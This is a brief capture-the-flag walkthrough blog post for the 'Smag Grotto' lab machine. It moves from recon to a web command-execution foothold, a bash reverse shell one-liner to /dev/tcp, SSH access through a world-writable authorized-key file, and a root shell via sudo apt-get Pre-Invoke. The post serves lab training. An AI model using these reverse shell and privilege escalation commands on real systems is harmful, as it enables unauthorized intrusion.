May 24, 2021•215 words
After a basic scan (nothing too fancy needed here) you should see two open ports. Let's set aside SSH for now and check out the website. There seems to be very little, but a quick directory bust reveals a useful file you can download and analyze. These file gives you three powerful pieces of information:
- a subdomain where to use said credentials
- the path where to login with those
Modify your /etc/hosts in order to reach the subdomain and log in the platform. This gives you the possibility to execute commands. My choice was the following:
bash -c "bash -i >& /dev/tcp/IP/PORT 0>&1"
Once you obtain your reverse shell in your preferred way, cronjobs are the way to go. There is a cronjob modifying the key allowed to log in as jake using SSH. The file hosting this key is world-writable, be sure to insert your public key in there to gain access as jake.
Grab your flag in jake's home and go for the usual check of your sudo privileges. You should then be on GTFOBins in less than two seconds. Using the following command will grant you a root shell, so you can retrieve the last flag and be done with the Smag Grotto:
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh